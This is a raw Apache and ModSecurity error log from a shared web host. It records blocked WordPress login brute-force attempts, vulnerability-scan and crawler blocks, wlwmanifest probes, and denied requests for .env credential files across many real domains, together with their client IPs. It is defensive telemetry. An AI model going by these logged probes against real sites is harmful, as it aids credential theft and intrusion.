[Tue May 26 19:42:41.544562 2026] [security2:error] [pid 70836:tid 71018] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqWe_FvbQ_BhqVMRWZZQAAALk"]
[Tue May 26 19:42:41.787534 2026] [security2:error] [pid 70836:tid 70928] [remote 103.95.119.103:53802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWqWe_FvbQ_BhqVMRWZcQAAxFs"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:42:44.135462 2026] [security2:error] [pid 70836:tid 71013] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqW-_FvbQ_BhqVMRWZpAAAALQ"]
[Tue May 26 19:42:44.602983 2026] [autoindex:error] [pid 70836:tid 71092] [client 66.132.186.206:2264] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:42:46.499887 2026] [security2:error] [pid 70836:tid 71024] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqXu_FvbQ_BhqVMRWZ4gAAAL8"]
[Tue May 26 19:42:48.120948 2026] [authz_core:error] [pid 70836:tid 70989] [client 176.65.139.229:26588] AH01630: client denied by server configuration: /home2/azurm42s/commune.azurmediatec.com/.env
[Tue May 26 19:42:48.808099 2026] [security2:error] [pid 70836:tid 70972] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqYO_FvbQ_BhqVMRWaIgAAAIs"]
[Tue May 26 19:42:51.083235 2026] [security2:error] [pid 70836:tid 71055] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqYu_FvbQ_BhqVMRWadwAAAN4"]
[Tue May 26 19:42:51.495801 2026] [authz_core:error] [pid 70836:tid 71078] [client 176.65.139.234:30198] AH01630: client denied by server configuration: /home2/azurm42s/prototypecommune.azurmediatec.com/.env
[Tue May 26 19:42:53.326726 2026] [security2:error] [pid 70836:tid 71088] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqZO_FvbQ_BhqVMRWarAAAAP8"]
[Tue May 26 19:42:54.563515 2026] [security2:error] [pid 70836:tid 71069] [client 43.173.180.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWqZu_FvbQ_BhqVMRWa4AAAAOw"]
[Tue May 26 19:42:55.173580 2026] [security2:error] [pid 70836:tid 70998] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqZu_FvbQ_BhqVMRWa6QAAAKU"]
[Tue May 26 19:42:56.377090 2026] [security2:error] [pid 70836:tid 70979] [client 78.46.215.1:33770] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWqaO_FvbQ_BhqVMRWbGQAAAJI"], referer: https://thegoodsporting.com
[Tue May 26 19:42:58.056100 2026] [security2:error] [pid 70836:tid 71001] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqae_FvbQ_BhqVMRWbQwAAAKg"]
[Tue May 26 19:42:58.119005 2026] [security2:error] [pid 70836:tid 71007] [client 185.191.171.8:12392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-2nd/day/2022-09-08/"] [unique_id "ahWqau_FvbQ_BhqVMRWbUAAAAK4"]
[Tue May 26 19:42:58.119126 2026] [security2:error] [pid 70836:tid 71007] [client 185.191.171.8:12392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-2nd/day/2022-09-08/"] [unique_id "ahWqau_FvbQ_BhqVMRWbUAAAAK4"]
[Tue May 26 19:42:58.818613 2026] [security2:error] [pid 70836:tid 71000] [client 123.24.151.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqau_FvbQ_BhqVMRWbWgAAAKc"]
[Tue May 26 19:42:59.962752 2026] [security2:error] [pid 70836:tid 71001] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqa-_FvbQ_BhqVMRWbfQAAAKg"]
[Tue May 26 19:43:00.515604 2026] [security2:error] [pid 70836:tid 70995] [client 192.241.240.154:49212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWqbO_FvbQ_BhqVMRWbnQAAAKI"]
[Tue May 26 19:43:01.111997 2026] [security2:error] [pid 70836:tid 70922] [remote 74.7.241.58:54316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWqbe_FvbQ_BhqVMRWbpgAA5FU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:43:01.357208 2026] [security2:error] [pid 70836:tid 71054] [client 114.119.135.84:62765] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-full-width-sidebar"] [unique_id "ahWqbe_FvbQ_BhqVMRWbvwAAAN0"], referer: http://www.anujtradingco.com/blog-2/blog-full-width-sidebar
[Tue May 26 19:43:01.821760 2026] [security2:error] [pid 70836:tid 70838] [remote 72.167.150.128:37880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWqbe_FvbQ_BhqVMRWbyAAA_AE"]
[Tue May 26 19:43:02.684810 2026] [security2:error] [pid 70836:tid 70973] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqbu_FvbQ_BhqVMRWb3QAAAIw"]
[Tue May 26 19:43:03.166531 2026] [security2:error] [pid 70836:tid 70871] [remote 72.167.150.128:37880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWqb-_FvbQ_BhqVMRWb_wAA4SI"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 19:43:05.194174 2026] [security2:error] [pid 70836:tid 71058] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqcO_FvbQ_BhqVMRWcPQAAAOE"]
[Tue May 26 19:43:05.791309 2026] [core:crit] [pid 70836:tid 71089] (13)Permission denied: [client 52.167.144.19:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:43:07.501041 2026] [security2:error] [pid 70836:tid 70971] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqc-_FvbQ_BhqVMRWchQAAAIo"]
[Tue May 26 19:43:09.824651 2026] [security2:error] [pid 70836:tid 70984] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqde_FvbQ_BhqVMRWcuwAAAJc"]
[Tue May 26 19:43:12.162342 2026] [security2:error] [pid 70836:tid 71059] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqd-_FvbQ_BhqVMRWc9gAAAOI"]
[Tue May 26 19:43:12.522834 2026] [http2:info] [pid 77894:tid 77894] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:43:13.936347 2026] [security2:error] [pid 77894:tid 78079] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqeTomEhVPuJoD1MZVoAAAADc"]
[Tue May 26 19:43:14.472883 2026] [security2:error] [pid 77894:tid 78010] [remote 52.167.144.211:1735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 211.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com"] [uri "/bhavish-interiordesign.php"] [unique_id "ahWqejomEhVPuJoD1MZVtAAAZHM"]
[Tue May 26 19:43:14.960249 2026] [security2:error] [pid 77894:tid 78142] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqejomEhVPuJoD1MZVvQAAAHY"]
[Tue May 26 19:43:15.704311 2026] [core:crit] [pid 77894:tid 78057] (13)Permission denied: [client 40.77.167.156:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:43:16.976264 2026] [security2:error] [pid 77894:tid 78133] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqfDomEhVPuJoD1MZV8wAAAG0"]
[Tue May 26 19:43:17.524293 2026] [security2:error] [pid 77894:tid 78016] [remote 141.138.139.98:46064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqfTomEhVPuJoD1MZWCQAAf3k"]
[Tue May 26 19:43:17.803801 2026] [security2:error] [pid 77894:tid 77911] [remote 141.138.139.98:46064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqfTomEhVPuJoD1MZWFQAANxA"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:43:19.066914 2026] [security2:error] [pid 77894:tid 77912] [remote 78.142.18.172:57570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWqfjomEhVPuJoD1MZWNAAAVBE"]
[Tue May 26 19:43:19.303424 2026] [security2:error] [pid 77894:tid 77919] [remote 78.142.18.172:57570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWqfzomEhVPuJoD1MZWQwAAVhg"], referer: https://jhonparra.com/wp-login.php
[Tue May 26 19:43:19.937489 2026] [security2:error] [pid 77894:tid 78055] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqfzomEhVPuJoD1MZWSQAAAB8"]
[Tue May 26 19:43:21.889054 2026] [security2:error] [pid 77894:tid 78124] [client 84.70.9.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqgTomEhVPuJoD1MZWgAAAAGQ"]
[Tue May 26 19:43:22.666285 2026] [security2:error] [pid 77894:tid 78091] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqgjomEhVPuJoD1MZWnAAAAEM"]
[Tue May 26 19:43:23.564801 2026] [security2:error] [pid 77894:tid 77928] [remote 97.74.87.194:39708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.87.74.97.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqgzomEhVPuJoD1MZWsgAAQiE"]
[Tue May 26 19:43:24.017139 2026] [security2:error] [pid 77894:tid 77933] [remote 97.74.87.194:39708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.87.74.97.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqhDomEhVPuJoD1MZWwgAADSY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:25.470858 2026] [security2:error] [pid 77894:tid 78059] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqhTomEhVPuJoD1MZW4AAAACM"]
[Tue May 26 19:43:26.781714 2026] [security2:error] [pid 77894:tid 78078] [client 89.124.94.93:61116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.94.124.89.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWqhjomEhVPuJoD1MZXEAAAADY"], referer: https://www.cagmedya.com/
[Tue May 26 19:43:27.861403 2026] [security2:error] [pid 77894:tid 78102] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqhzomEhVPuJoD1MZXIQAAAE4"]
[Tue May 26 19:43:28.725475 2026] [security2:error] [pid 77894:tid 77942] [remote 38.95.35.74:40646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqiDomEhVPuJoD1MZXQQAAUC8"]
[Tue May 26 19:43:28.971917 2026] [security2:error] [pid 77894:tid 77945] [remote 38.95.35.74:40646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqiDomEhVPuJoD1MZXTQAAejI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:29.336672 2026] [security2:error] [pid 77894:tid 78026] [client 66.249.66.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWqiTomEhVPuJoD1MZXVwAAAAI"]
[Tue May 26 19:43:30.718014 2026] [security2:error] [pid 77894:tid 78085] [client 192.241.240.154:59792] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWqijomEhVPuJoD1MZXeQAAAD0"]
[Tue May 26 19:43:30.748260 2026] [security2:error] [pid 77894:tid 78025] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqijomEhVPuJoD1MZXcgAAAAE"]
[Tue May 26 19:43:31.940708 2026] [security2:error] [pid 77894:tid 78123] [client 192.241.240.154:62781] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWqizomEhVPuJoD1MZXmAAAAGM"]
[Tue May 26 19:43:32.239655 2026] [security2:error] [pid 77894:tid 77967] [remote 162.240.52.198:33664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqjDomEhVPuJoD1MZXnAAAOkg"]
[Tue May 26 19:43:32.628033 2026] [security2:error] [pid 77894:tid 77970] [remote 162.240.52.198:33664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqjDomEhVPuJoD1MZXrAAAFUs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:32.802356 2026] [security2:error] [pid 77894:tid 78076] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqjDomEhVPuJoD1MZXqAAAADQ"]
[Tue May 26 19:43:34.096443 2026] [security2:error] [pid 77894:tid 77979] [remote 136.110.38.51:55048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWqjTomEhVPuJoD1MZX1QAAL1Q"]
[Tue May 26 19:43:34.699613 2026] [fcgid:warn] [pid 77894:tid 78074] (70014)End of file found: [client 66.132.172.96:10290] mod_fcgid: can't get data from http client
[Tue May 26 19:43:35.049237 2026] [security2:error] [pid 77894:tid 77960] [remote 49.12.3.147:43338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWqjjomEhVPuJoD1MZX_AAAQEE"]
[Tue May 26 19:43:35.568426 2026] [security2:error] [pid 77894:tid 77962] [remote 78.142.18.172:37604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqjzomEhVPuJoD1MZYDQAAK0M"]
[Tue May 26 19:43:35.900877 2026] [security2:error] [pid 77894:tid 78133] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqjzomEhVPuJoD1MZYCwAAAG0"]
[Tue May 26 19:43:36.200709 2026] [security2:error] [pid 77894:tid 77965] [remote 78.142.18.172:37604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqkDomEhVPuJoD1MZYIgAAU0Y"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:37.613678 2026] [security2:error] [pid 77894:tid 77986] [remote 51.91.98.45:57152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqkTomEhVPuJoD1MZYTgAAbls"]
[Tue May 26 19:43:37.909060 2026] [security2:error] [pid 77894:tid 78055] [client 46.8.57.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqkTomEhVPuJoD1MZYYQAAAB8"], referer: https://www.anujtradingco.com/
[Tue May 26 19:43:38.057528 2026] [autoindex:error] [pid 77894:tid 78129] [client 43.130.105.21:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://aeromodellingconsultants.com
